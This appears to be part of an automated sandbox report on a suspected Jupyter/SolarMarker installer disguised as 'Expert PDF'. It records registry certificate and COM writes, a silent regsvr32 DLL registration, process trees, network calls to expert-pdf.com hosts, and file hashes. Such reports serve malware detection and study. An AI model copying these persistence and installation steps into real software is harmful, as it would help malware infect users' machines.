| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe
"C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"
C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp" /SL5="$70122,111680340,999424,C:\Users\Admin\AppData\Local\Temp\07d8c9f5-af55-421d-9023-7932ab1810d7.exe"
C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
"C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /s "C:\ProgramData\Expert PDF 14\Installation\Statistics.dll"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{D512BD03-0077-4504-AE19-566B43F44E19}
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api-updateservice.expert-pdf.com | udp |
| CA | 64.15.159.225:443 | api-updateservice.expert-pdf.com | tcp |
| US | 8.8.8.8:53 | wsgeoip.expert-pdf.com | udp |
| CA | 64.15.159.225:443 | wsgeoip.expert-pdf.com | tcp |
Files
memory/1768-54-0x0000000000400000-0x0000000000501000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
| MD5 | a95712856401dda069ee07c719bdb2ab |
| SHA1 | 73293e45116e0930d78087741016cde920922a74 |
| SHA256 | b4878d6b9d7462cafe81d20da148a44750aa707f4e34eae1f23f21f9e0d9afa0 |
| SHA512 | 2ea973307830b193379a0b7698682bfecdfcc6bab685dcf60af1c23c94b16b862924148a2f9e8b2ac2b7734c3552193dc0459c7961ab8730b0282101fa22ff85 |
C:\Users\Admin\AppData\Local\Temp\is-IBLA6.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp
| MD5 | a95712856401dda069ee07c719bdb2ab |
| SHA1 | 73293e45116e0930d78087741016cde920922a74 |
| SHA256 | b4878d6b9d7462cafe81d20da148a44750aa707f4e34eae1f23f21f9e0d9afa0 |
| SHA512 | 2ea973307830b193379a0b7698682bfecdfcc6bab685dcf60af1c23c94b16b862924148a2f9e8b2ac2b7734c3552193dc0459c7961ab8730b0282101fa22ff85 |
\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\_isetup\_isdecmp.dll
| MD5 | c6ae924ad02500284f7e4efa11fa7cfc |
| SHA1 | 2a7770b473b0a7dc9a331d017297ff5af400fed8 |
| SHA256 | 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26 |
| SHA512 | f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae |
memory/1372-66-0x00000000001E0000-0x00000000001E1000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
| MD5 | 440d4f0c478b77d0e1a95e8165dfb650 |
| SHA1 | d8cd10e080167a93273a6969b61648ce9b9debb2 |
| SHA256 | 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462 |
| SHA512 | a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5 |
C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
| MD5 | 440d4f0c478b77d0e1a95e8165dfb650 |
| SHA1 | d8cd10e080167a93273a6969b61648ce9b9debb2 |
| SHA256 | 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462 |
| SHA512 | a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5 |
C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
| MD5 | 440d4f0c478b77d0e1a95e8165dfb650 |
| SHA1 | d8cd10e080167a93273a6969b61648ce9b9debb2 |
| SHA256 | 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462 |
| SHA512 | a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5 |
memory/1372-81-0x0000000000400000-0x0000000000723000-memory.dmp
memory/1768-83-0x0000000000400000-0x0000000000501000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-C4ADO.tmp\Expert_PDF.exe
| MD5 | 440d4f0c478b77d0e1a95e8165dfb650 |
| SHA1 | d8cd10e080167a93273a6969b61648ce9b9debb2 |
| SHA256 | 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462 |
| SHA512 | a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5 |
C:\Users\Admin\AppData\Local\Temp\Cab409C.tmp
| MD5 | fc4666cbca561e864e7fdf883a9e6661 |
| SHA1 | 2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5 |
| SHA256 | 10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b |
| SHA512 | c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d |
C:\Users\Admin\AppData\Local\Temp\Tar4198.tmp
| MD5 | 73b4b714b42fc9a6aaefd0ae59adb009 |
| SHA1 | efdaffd5b0ad21913d22001d91bf6c19ecb4ac41 |
| SHA256 | c0cf8cc04c34b5b80a2d86ad0eafb2dd71436f070c86b0321fba0201879625fd |
| SHA512 | 73af3c51b15f89237552b1718bef21fd80788fa416bab2cb2e7fb3a60d56249a716eda0d2dd68ab643752272640e7eaaaf57ce64bcb38373ddc3d035fb8d57cd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | e71c8443ae0bc2e282c73faead0a6dd3 |
| SHA1 | 0c110c1b01e68edfacaeae64781a37b1995fa94b |
| SHA256 | 95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72 |
| SHA512 | b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6 |
C:\Users\Admin\AppData\Local\Temp\Tar4392.tmp
| MD5 | be2bec6e8c5653136d3e72fe53c98aa3 |
| SHA1 | a8182d6db17c14671c3d5766c72e58d87c0810de |
| SHA256 | 1919aab2a820642490169bdc4e88bd1189e22f83e7498bf8ebdfb62ec7d843fd |
| SHA512 | 0d1424ccdf0d53faf3f4e13d534e12f22388648aa4c23edbc503801e3c96b7f73c7999b760b5bef4b5e9dd923dffe21a21889b1ce836dd428420bf0f4f5327ff |
C:\ProgramData\Expert PDF 14\Installation\Statistics.dll
| MD5 | e645ca01c01f9f8489c07a6b41fbd318 |
| SHA1 | 3e8ea394f6605bd8529c58a143f01675adee371a |
| SHA256 | a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e |
| SHA512 | c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6 |
\ProgramData\Expert PDF 14\Installation\Statistics.dll
| MD5 | e645ca01c01f9f8489c07a6b41fbd318 |
| SHA1 | 3e8ea394f6605bd8529c58a143f01675adee371a |
| SHA256 | a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e |
| SHA512 | c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6 |
\ProgramData\Expert PDF 14\Installation\Statistics.dll
| MD5 | e645ca01c01f9f8489c07a6b41fbd318 |
| SHA1 | 3e8ea394f6605bd8529c58a143f01675adee371a |
| SHA256 | a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e |
| SHA512 | c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6 |
\ProgramData\Expert PDF 14\Installation\Statistics.dll
| MD5 | e645ca01c01f9f8489c07a6b41fbd318 |
| SHA1 | 3e8ea394f6605bd8529c58a143f01675adee371a |
| SHA256 | a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e |
| SHA512 | c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6 |
\ProgramData\Expert PDF 14\Installation\Statistics.dll
| MD5 | e645ca01c01f9f8489c07a6b41fbd318 |
| SHA1 | 3e8ea394f6605bd8529c58a143f01675adee371a |
| SHA256 | a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e |
| SHA512 | c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6 |
\ProgramData\Expert PDF 14\Installation\Statistics.dll
| MD5 | e645ca01c01f9f8489c07a6b41fbd318 |
| SHA1 | 3e8ea394f6605bd8529c58a143f01675adee371a |
| SHA256 | a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e |
| SHA512 | c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | acc795abc9374d0e5f0a3b9bba4d81b6 |
| SHA1 | 6752858c95e9aa95ba51d367eb098fd4caea3766 |
| SHA256 | 2a2106f5ec627952e4dafc37f1c6e0bbd1abeb6633d2aec13c48f92e2b4e7aac |
| SHA512 | e6ffb0f51858ba10d4dc5da6ad2b44015ed9deed7b3fdd9f0e4e2f40be7f5fe8805e80f0c1e2727a5a33d9298524321a330c95b3f8949d3790f86737bb9b0970 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-03-17 18:08
Reported
2023-03-17 18:35
Platform
win10v2004-20230220-en
Max time kernel
1218s
Max time network
1234s
Command Line
Signatures
Jupyter, SolarMarker
Blocklisted process makes network request
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| N/A | N/A | C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\DllHost.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{74A6753A-DE17-4161-BBF1-F930444A667A}\ = "IDownloadItemExternalApp" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6C789195-CB9C-4503-B896-76E5A1D9D0D0}\TypeLib\Version = "1.0" | C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D9D9D34-5DD0-425D-B577-29D2DB57DC90}\Version\ = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EC5ECDA9-D4FF-4B92-A8E4-BB343310AD6F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8BEE0069-45C2-4403-B726-50CF8288DDD2}\ = "IInstallItemExternalApp" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7E39BBB2-F9C5-488C-AC6C-DAA3EFFA4CE1}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1410AE4F-1218-4A9F-87D9-666B1DB82FF1}\LocalizedString = "@%programdata%\\Expert PDF 14\\Installation\\Statistics.dll,-127" | C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6C789195-CB9C-4503-B896-76E5A1D9D0D0}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05B3D680-372E-48F5-9017-2CB60FAE4FBD}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CA5A508D-5E26-4167-9871-E1686FB231F5}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{27DC8C77-EEBE-4533-9845-ABD40CEB455F}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{356EF9DF-D3FE-4DA6-9EF9-B29CEF99A571}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{883556F2-137D-42B1-A379-EF040DB83897}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AC45A346-0197-4696-8D32-758EC0B0E4DF}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1410AE4F-1218-4A9F-87D9-666B1DB82FF1}\ = "Installer Class" | C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69B200C5-B71E-43C7-8807-B4D7285D0804}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{88395ED4-CB15-449D-AA03-0286C132147C}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{45B9EEC4-462E-427D-B2AA-26380735AE7A}\ = "IGeoIPStruct" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7D9D9D34-5DD0-425D-B577-29D2DB57DC90}\Version | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{066D076C-674B-477C-A219-17FE4B04FE7D}\TypeLib\ = "{5187AFD5-7B57-4E74-B36B-8425B39D6ED1}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EC5ECDA9-D4FF-4B92-A8E4-BB343310AD6F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AB369CC1-15D6-47B3-B7CA-3061B7DB8E2B}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{54D1BE8B-911E-4F28-BC0D-E7545D5FD83B}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37172CF3-167C-4B55-B02D-3604464210DF}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0C65FB04-3503-4B15-A148-8904F9450F50}\Version\ = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7EAF85B3-F511-4B8D-8731-95015ACED100}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A3D22F5C-199D-42A3-B1DE-215B57F8F065}\InprocServer32\ = "C:\\ProgramData\\Expert PDF 14\\Installation\\Statistics.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{243F1D9D-80F0-42A2-9A44-3F6ADDCFE4EC}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7AE953E8-514E-4210-A41A-B6ACE120EC12}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E73C958-23B4-45B5-8B8C-346ACA41C9FC}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F8CBFADD-0796-4046-9D10-B846E0118879}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4149D4DA-11AA-4597-9AA5-A6E3DCD8DFB3}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E879C546-B160-435A-AC8D-2C8720BDE1F5}\ = "IStartItemModule" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{904A1997-BEDF-4442-9F5B-D1CBE8308AC1}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{27DC8C77-EEBE-4533-9845-ABD40CEB455F}\AppID = "{D512BD03-0077-4504-AE19-566B43F44E19}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
